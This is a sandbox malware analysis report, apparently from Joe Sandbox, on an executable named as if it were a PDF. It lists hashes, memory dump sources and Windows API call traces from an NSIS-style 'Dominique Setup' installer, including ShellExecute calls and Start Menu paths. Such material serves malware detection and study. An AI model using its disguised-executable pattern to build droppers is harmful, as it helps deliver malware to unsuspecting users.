                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID:
                                                                      • API String ID: 3472027048-0
                                                                      • Opcode ID: dc3d2d615763224e0b4d086791dfb261f8c28fceebc5a70e28d87f5d5b295402
                                                                      • Instruction ID: 60e4a6f428f33354aa107cd4fbd7dd9a9c37d23ed13856081ad7c9c956fab211
                                                                      • Opcode Fuzzy Hash: dc3d2d615763224e0b4d086791dfb261f8c28fceebc5a70e28d87f5d5b295402
                                                                      • Instruction Fuzzy Hash: FBD0C777B1454047D710F7B97E8545A6399F7513253204933D502F1091D578C9069A29
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CharNextA.USER32(?,004031FA,"C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe",00000020), ref: 004057D9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext
                                                                      • String ID:
                                                                      • API String ID: 3213498283-0
                                                                      • Opcode ID: 34075671c2b15bfe90313587f721bfb83bbc5626d38128025375f4e5ae623440
                                                                      • Instruction ID: dc214379263094bd3ac6d45bee5908574ed7c4f63653bd68f3b20c8c8f565c76
                                                                      • Opcode Fuzzy Hash: 34075671c2b15bfe90313587f721bfb83bbc5626d38128025375f4e5ae623440
                                                                      • Instruction Fuzzy Hash: 0AC08C3440C784EBC6214720902886BBFF0AA52300F3884ABF0C263251E238AC10AB3B
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003F9), ref: 004048DD
                                                                      • GetDlgItem.USER32(?,00000408), ref: 004048E8
                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404932
                                                                      • LoadBitmapA.USER32(0000006E), ref: 00404945
                                                                      • SetWindowLongA.USER32(?,000000FC,00404EBC), ref: 0040495E
                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404972
                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404984
                                                                      • SendMessageA.USER32(?,00001109,00000002), ref: 0040499A
                                                                      • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004049A6
                                                                      • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004049B8
                                                                      • DeleteObject.GDI32(00000000), ref: 004049BB
                                                                      • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049E6
                                                                      • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049F2
                                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A87
                                                                      • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404AB2
                                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AC6
                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 00404AF5
                                                                      • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B03
                                                                      • ShowWindow.USER32(?,00000005), ref: 00404B14
                                                                      • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C11
                                                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C76
                                                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C8B
                                                                      • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404CAF
                                                                      • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404CCF
                                                                      • ImageList_Destroy.COMCTL32(00000000), ref: 00404CE4
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00404CF4
                                                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D6D
                                                                      • SendMessageA.USER32(?,00001102,?,?), ref: 00404E16
                                                                      • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404E25
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404E45
                                                                      • ShowWindow.USER32(?,00000000), ref: 00404E93
                                                                      • GetDlgItem.USER32(?,000003FE), ref: 00404E9E
                                                                      • ShowWindow.USER32(00000000), ref: 00404EA5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                      • String ID: $M$N
                                                                      • API String ID: 1638840714-813528018
                                                                      • Opcode ID: 98e2d7c6ee6a234b068a5e6a8c88a9cece07b0d44b3c2dcd542ae9ed88053873
                                                                      • Instruction ID: ee94c2e81ac7fcd3d2633371b1ae487f30220c2a0e0de663c2dd45f1c85c3c3c
                                                                      • Opcode Fuzzy Hash: 98e2d7c6ee6a234b068a5e6a8c88a9cece07b0d44b3c2dcd542ae9ed88053873
                                                                      • Instruction Fuzzy Hash: D70262B0A00209AFEB20DF55DC45AAE7BB5FB84315F14413AF610BA2E1C7799D51CF58
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetDlgItem.USER32(?,000003FB), ref: 004043A1
                                                                      • SetWindowTextA.USER32(00000000,?), ref: 004043CB
                                                                      • SHBrowseForFolderA.SHELL32(?,00428C40,?), ref: 0040447C
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404487
                                                                      • lstrcmpiA.KERNEL32(Call,Dominique Setup: Installing), ref: 004044B9
                                                                      • lstrcatA.KERNEL32(?,Call), ref: 004044C5
                                                                      • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004044D7
                                                                        • Part of subcall function 00405509: GetDlgItemTextA.USER32(?,?,00000400,0040450E), ref: 0040551C
                                                                        • Part of subcall function 00405F9A: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe",76293410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
                                                                        • Part of subcall function 00405F9A: CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
                                                                        • Part of subcall function 00405F9A: CharNextA.USER32(?,"C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe",76293410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
                                                                        • Part of subcall function 00405F9A: CharPrevA.USER32(?,?,76293410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014
                                                                      • GetDiskFreeSpaceA.KERNEL32(00428838,?,?,0000040F,?,00428838,00428838,?,00000001,00428838,?,?,000003FB,?), ref: 00404595
                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004045B0
                                                                        • Part of subcall function 00404709: lstrlenA.KERNEL32(Dominique Setup: Installing,Dominique Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
                                                                        • Part of subcall function 00404709: wsprintfA.USER32 ref: 004047AF
                                                                        • Part of subcall function 00404709: SetDlgItemTextA.USER32(?,Dominique Setup: Installing), ref: 004047C2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                      • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes$Call$Dominique Setup: Installing
                                                                      • API String ID: 2624150263-335891194
                                                                      • Opcode ID: 92617ce1ab210426147f8d25d609736ba8401d1a6e22c2ed364add3f88eda8c7
                                                                      • Instruction ID: ab5132907fc5b2f665edfad9f17b3ca32a66d27d09768481e079f0ca797b6646
                                                                      • Opcode Fuzzy Hash: 92617ce1ab210426147f8d25d609736ba8401d1a6e22c2ed364add3f88eda8c7
                                                                      • Instruction Fuzzy Hash: 07A194B1900209ABDB11AFA2CC45AAF77B8EF85314F10843BF601B62D1D77C8941CB69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CoCreateInstance.OLE32(00407514,?,00000001,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189
                                                                      Strings
                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Skoleophold, xrefs: 0040211D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharCreateInstanceMultiWide
                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Skoleophold
                                                                      • API String ID: 123533781-3007469680
                                                                      • Opcode ID: 1f408d59b01629bfe246ddbdf59bfe45880d3d1aed491cd0b433af8612de1ea5
                                                                      • Instruction ID: 202bff00353f62e800299527826cf24c9a9ce8e01df6a73eade79aa1dd8fb932
                                                                      • Opcode Fuzzy Hash: 1f408d59b01629bfe246ddbdf59bfe45880d3d1aed491cd0b433af8612de1ea5
                                                                      • Instruction Fuzzy Hash: 16512775A00208BFCF10DFA4CD88A9DBBB5BF48318F20856AF615EB2D1DA799941CB14
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402697
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: FileFindFirst
                                                                      • String ID:
                                                                      • API String ID: 1974802433-0
                                                                      • Opcode ID: c726fce334b162bffbc1a7bc3135fcd734087509c80d7b9bc143c566e0aa852e
                                                                      • Instruction ID: 3dffafe4ea1a5cbb8d5ba181f96d08faa62a405c2aca3b81b81ef469795ec413
                                                                      • Opcode Fuzzy Hash: c726fce334b162bffbc1a7bc3135fcd734087509c80d7b9bc143c566e0aa852e
                                                                      • Instruction Fuzzy Hash: 7AF0A0326081049FE701EBA49949AEEB7789F21324F60057BE241A21C1D7B84985AB3A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e604220aa4cc57a0d507a3eee92e1260e78aef2c865a073fe0bf8dde490b4c6a
                                                                      • Instruction ID: 52966d4a0c143cd855de3d8d32e2f948802446bd43c2bd9d1e79afe7cfa9a62c
                                                                      • Opcode Fuzzy Hash: e604220aa4cc57a0d507a3eee92e1260e78aef2c865a073fe0bf8dde490b4c6a
                                                                      • Instruction Fuzzy Hash: D1E19B71901709DFDB24CF58C890BAABBF5FB44305F15882EE497A72D1D378AA91CB14
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c5f7cd6dd9e448d1ceba1cbc86ba17909bb361cdcfc346b133718b62247df967
                                                                      • Instruction ID: 28dd1b742c6822d911ebb92dd847779981f1f79bff0408386317dd500df5852d
                                                                      • Opcode Fuzzy Hash: c5f7cd6dd9e448d1ceba1cbc86ba17909bb361cdcfc346b133718b62247df967
                                                                      • Instruction Fuzzy Hash: 53C12971A0021A8BCF18CF68D5905EEB7B2FF99314F26827AD85677380D734A952CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040E8
                                                                      • GetDlgItem.USER32(00000000,000003E8), ref: 004040FC
                                                                      • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040411A
                                                                      • GetSysColor.USER32(?), ref: 0040412B
                                                                      • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040413A
                                                                      • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404149
                                                                      • lstrlenA.KERNEL32(?), ref: 0040414C
                                                                      • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040415B
                                                                      • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404170
                                                                      • GetDlgItem.USER32(?,0000040A), ref: 004041D2
                                                                      • SendMessageA.USER32(00000000), ref: 004041D5
                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404200
                                                                      • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404240
                                                                      • LoadCursorA.USER32(00000000,00007F02), ref: 0040424F
                                                                      • SetCursor.USER32(00000000), ref: 00404258
                                                                      • ShellExecuteA.SHELL32(0000070B,open,0042D3A0,00000000,00000000,00000001), ref: 0040426B
                                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 00404278
                                                                      • SetCursor.USER32(00000000), ref: 0040427B
                                                                      • SendMessageA.USER32(00000111,00000001,00000000), ref: 004042A7
                                                                      • SendMessageA.USER32(00000010,00000000,00000000), ref: 004042BB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                      • String ID: (@@$Call$N$open
                                                                      • API String ID: 3615053054-2228552488
                                                                      • Opcode ID: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
                                                                      • Instruction ID: c92d02d703ef172067c6e48558b1c194508f37b8d1d7228abd04d5231d4a861f
                                                                      • Opcode Fuzzy Hash: 7868d9df4ae1d674ab0cf3f1043cffc922edae777938ca354114bc27cd0f8479
                                                                      • Instruction Fuzzy Hash: 5461D3B1A40209BFEB109F21DC45F6A7B68FB44755F10807AFB00BA2D1C7B8A951CB98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                      • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                      • DrawTextA.USER32(00000000,Dominique Setup,000000FF,00000010,00000820), ref: 00401156
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13453332366.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_BM-FM_NR.jbxd
                                                                      Similarity
                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                      • String ID: Dominique Setup$F
                                                                      • API String ID: 941294808-1828777385
                                                                      • Opcode ID: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
                                                                      • Instruction ID: 9af9226455e7fa8211e54ab4aa6b8deb1f4adf461e7c9b231a43246ca388c9df
                                                                      • Opcode Fuzzy Hash: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
                                                                      • Instruction Fuzzy Hash: F0419B71804249AFCB058FA5CD459AFBBB9FF44310F00812AF961AA1A0C738EA51DFA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • lstrcpyA.KERNEL32(0042B5F8,NUL,?,00000000,?,00000000,00405C0B,?,?), ref: 00405A87
                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405C0B,?,?), ref: 00405AAB
                                                                      • GetShortPathNameA.KERNEL32(?,0042B5F8,00000400), ref: 00405AB4
                                                                        • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                                        • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
                                                                      • GetShortPathNameA.KERNEL32(0042B9F8,0042B9F8,00000400), ref: 00405AD1
                                                                      • wsprintfA.USER32 ref: 00405AEF
                                                                      • GetFileSize.KERNEL32(00000000,00000000,0042B9F8,C0000000,00000004,0042B9F8,?,?,?,?,?), ref: 00405B2A
                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B39
                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B71
                                                                      • SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,0042B1F8,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405BC7
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00405BD8
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BDF
                                                                        • Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe,80000000,00000003), ref: 004059A6
                                                                        • Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.13452838244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.13452773713.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452901534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.13452966083.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
